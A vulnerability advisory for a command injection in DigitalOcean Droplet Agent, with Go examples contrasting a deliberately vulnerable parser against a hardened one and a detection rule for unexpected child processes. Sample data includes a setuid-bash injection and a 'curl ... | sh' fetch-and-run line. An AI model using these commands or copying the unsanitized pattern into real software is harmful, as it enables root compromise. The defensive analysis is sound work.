CVE-2026-24516
published 2026-03-23

Priority: P2 (68)
Severity: high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS: 2.50% (82.7th percentile)
A command injection vulnerability exists in DigitalOcean Droplet Agent through 1.3.2. The troubleshooting actioner component (internal/troubleshooting/actioner/actioner.go) processes metadata fetched from the metadata service endpoint and executes the commands listed in the TroubleshootingAgent.Requesting array without adequate input validation. The code checks that each requested artifact exists in the validInvestigationArtifacts map, but it does not sanitize the command content that follows the "command:" prefix. An attacker who can control metadata responses can therefore inject and execute arbitrary OS commands with root privileges.

The metadata fetch is triggered by sending a TCP packet with specific sequence numbers to the SSH port, after which the agent requests http://169.254.169.254/metadata/v1.json. Three files make up the affected command execution flow: internal/troubleshooting/actioner/actioner.go (insufficient validation), internal/troubleshooting/command/exec.go (direct exec.CommandContext call), and internal/troubleshooting/command/command.go (command parsing without sanitization).

Successful exploitation can lead to complete system compromise, data exfiltration, privilege escalation, and potential lateral movement across cloud infrastructure.
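The flaw class described above is "validate the name, trust the payload". The following Go program is an added example written for this page, not code from droplet-agent: it models the flawed flow (artifact name checked against validInvestigationArtifacts, text after "command:" passed straight to argv) next to a hardened parser that resolves the artifact name to a fixed argv owned by the binary. The entry layout "<artifact> command:<program> <args...>", the map contents and the artifactCommands table are assumptions made for the illustration; the real agent's metadata format and artifact names are not shown on this page.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"os/exec"
	"strings"
	"time"
)

// Constructed allowlist for this example. The real agent's validInvestigationArtifacts
// map has different contents; only the idea (named artifacts the agent knows how to
// collect) is taken from the advisory.
var validInvestigationArtifacts = map[string]bool{
	"disk_usage": true,
	"dmesg":      true,
}

// artifactCommands is the hardened counterpart: every allowed artifact maps to a
// fixed argv that lives in the binary, never in metadata. Contents are constructed.
var artifactCommands = map[string][]string{
	"disk_usage": {"df", "-h"},
	"dmesg":      {"dmesg", "--time-format", "iso"},
}

const commandPrefix = "command:"

// parseRequestVulnerable models the flawed flow the advisory describes. The layout of a
// Requesting entry is an assumption here: "<artifact> command:<program> <args...>".
// The artifact name is checked against the map, but the text after "command:" is split
// into argv and handed back untouched, so whoever controls the metadata document
// controls argv[0] and every argument of the process the agent will spawn as root.
func parseRequestVulnerable(entry string) ([]string, error) {
	parts := strings.SplitN(entry, " ", 2)
	if len(parts) != 2 || !validInvestigationArtifacts[parts[0]] {
		return nil, fmt.Errorf("unknown artifact %q", parts[0])
	}
	if !strings.HasPrefix(parts[1], commandPrefix) {
		return nil, errors.New("missing command: prefix")
	}
	// No check on the command itself: this is the injection point.
	return strings.Fields(strings.TrimPrefix(parts[1], commandPrefix)), nil
}

// parseRequestHardened ignores any command text carried in the entry and resolves the
// validated artifact name to the fixed argv from artifactCommands. Metadata may choose
// WHICH collector runs, never WHAT runs.
func parseRequestHardened(entry string) ([]string, error) {
	artifact := strings.SplitN(entry, " ", 2)[0]
	argv, ok := artifactCommands[artifact]
	if !ok {
		return nil, fmt.Errorf("unknown artifact %q", artifact)
	}
	return append([]string(nil), argv...), nil // copy, so callers cannot mutate the table
}

// buildCommand is the one place exec.CommandContext is called: argv[0] is resolved to an
// absolute path and the process inherits a bounded context, so a collector cannot hang
// the agent. No shell is involved, so shell metacharacters are never interpreted.
func buildCommand(ctx context.Context, argv []string) (*exec.Cmd, error) {
	if len(argv) == 0 {
		return nil, errors.New("empty argv")
	}
	path, err := exec.LookPath(argv[0])
	if err != nil {
		return nil, err
	}
	return exec.CommandContext(ctx, path, argv[1:]...), nil
}

func main() {
	// Constructed Requesting entries: one legitimate, one carrying an injected command.
	entries := []string{
		"disk_usage command:df -h",
		"disk_usage command:chmod u+s /bin/bash",
	}
	for _, e := range entries {
		vuln, _ := parseRequestVulnerable(e)
		hard, _ := parseRequestHardened(e)
		fmt.Printf("entry %q\n  vulnerable argv: %q\n  hardened argv:   %q\n", e, vuln, hard)
	}

	// Only the hardened argv is ever executed; the injected entry still yields "df -h".
	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()
	argv, _ := parseRequestHardened(entries[1])
	cmd, err := buildCommand(ctx, argv)
	if err != nil {
		fmt.Println("cannot build command:", err)
		return
	}
	out, err := cmd.CombinedOutput()
	fmt.Printf("ran %v: err=%v\n%s", cmd.Args, err, out)
}
```

The point of the hardened version is that the string from the metadata service never reaches exec.CommandContext at all; the only decision metadata makes is a map lookup. Sanitizing the command text (stripping metacharacters, quoting) would still leave argv[0] attacker-chosen, which is why an allowlist of complete argv vectors is the right shape of fix here.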

Affected

1 range

Vendor:        github.com
Product:       digitalocean_droplet-agent
Version range: 0 – 0.0.0-20260107162243-1101ffcb5672
Fixed in:      (not listed)

Detection & IOCs (extracted from sources)

Path: internal/troubleshooting/actioner/actioner.go
Path: internal/troubleshooting/command/exec.go
Path: internal/troubleshooting/command/command.go
  • Monitor for TCP packets with anomalous or specific sequence numbers sent to the SSH port (22) on hosts running Droplet Agent; this is the trigger mechanism for the exploit chain.
  • Alert on outbound HTTP requests from the droplet-agent process to the IMDS endpoint http://169.254.169.254/metadata/v1.json, especially when correlated with unusual SSH port activity.
  • Detect child processes spawned by droplet-agent (or its troubleshooting component) via exec.CommandContext; unexpected OS commands executed as root with this parent process indicate exploitation.
  • Audit validInvestigationArtifacts map entries at runtime. Exploitation relies on passing artifact validation while smuggling malicious command content, so look for artifact names that pass validation but carry injected shell metacharacters or unexpected programs in the command field.
  • The vulnerability only affects DigitalOcean Droplet Agent versions through 1.3.2; verify the installed version before applying detections.
  • Exploitation requires the attacker to control metadata service responses, i.e., to intercept or spoof traffic to the link-local IMDS at 169.254.169.254 (network-level MITM) or otherwise influence what the metadata service returns; the attack surface is limited to environments where that endpoint can be manipulated.
  • No fix had been added as of March 26, 2026 per the Go advisory; detections and mitigations (e.g., blocking unsolicited IMDS access from the agent) should remain in place until a patched version is available.
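The third bullet (unexpected children of droplet-agent) is the detection most likely to fire regardless of how the metadata was tampered with, because whatever the injected text was, it ends in a process whose parent is the agent. The Go program below is an added example for this page, not a rule shipped by DigitalOcean or any vendor: it runs that logic over a few constructed process-start records. The JSON field names (ts, parent_comm, uid, argv), the expected-collector set and the sample events are all assumptions made for the illustration; map your own telemetry's fields onto the struct and baseline the allowlist from what the deployed agent actually spawns.

```go
package main

import (
	"encoding/json"
	"fmt"
	"path"
	"strings"
)

// ProcEvent is the minimal process-start record this rule consumes. The schema is a
// constructed assumption for this example, not the agent's or any EDR's real format.
type ProcEvent struct {
	TS         string   `json:"ts"`
	ParentComm string   `json:"parent_comm"`
	UID        int      `json:"uid"`
	Argv       []string `json:"argv"`
}

// Alert is one finding from the rule.
type Alert struct {
	TS   string
	Argv string
	Why  string
}

const agentComm = "droplet-agent"

// expectedChildren names the collectors a healthy agent is expected to spawn. The set is
// constructed for this example; baseline it from the deployed agent before relying on it.
var expectedChildren = map[string]bool{"df": true, "dmesg": true}

// detectUnexpectedChildren flags any process whose parent is droplet-agent and whose
// program is not an expected collector. It is deliberately strict: if the child is a shell
// (sh -c ...), everything after -c is attacker text, so the rule does not try to parse it.
// A malformed record is returned as an error rather than skipped, so a broken feed cannot
// silently hide an alert.
func detectUnexpectedChildren(lines []string) ([]Alert, error) {
	var alerts []Alert
	for _, line := range lines {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		var ev ProcEvent
		if err := json.Unmarshal([]byte(line), &ev); err != nil {
			return nil, fmt.Errorf("unparseable event %q: %w", line, err)
		}
		if ev.ParentComm != agentComm || len(ev.Argv) == 0 {
			continue
		}
		if expectedChildren[path.Base(ev.Argv[0])] {
			continue
		}
		why := "unexpected child of " + agentComm
		if ev.UID == 0 {
			why += ", running as root"
		}
		alerts = append(alerts, Alert{TS: ev.TS, Argv: strings.Join(ev.Argv, " "), Why: why})
	}
	return alerts, nil
}

// sampleEvents are constructed records: a benign collector spawned by the agent, an
// unrelated sshd child, and an injected command spawned by the agent.
var sampleEvents = []string{
	`{"ts":"2026-03-24T10:00:01Z","parent_comm":"droplet-agent","uid":0,"argv":["/usr/bin/df","-h"]}`,
	`{"ts":"2026-03-24T10:00:02Z","parent_comm":"sshd","uid":1000,"argv":["/bin/bash"]}`,
	`{"ts":"2026-03-24T10:00:03Z","parent_comm":"droplet-agent","uid":0,"argv":["/bin/sh","-c","curl http://203.0.113.9/p | sh"]}`,
}

func main() {
	alerts, err := detectUnexpectedChildren(sampleEvents)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, a := range alerts {
		fmt.Printf("%s  %s  argv=%q\n", a.TS, a.Why, a.Argv)
	}
}
```

In practice this rule is worth pairing with the preceding bullet about IMDS requests: an alert from droplet-agent spawning a non-collector within a few seconds of a fetch of /metadata/v1.json is a much stronger signal than either event alone.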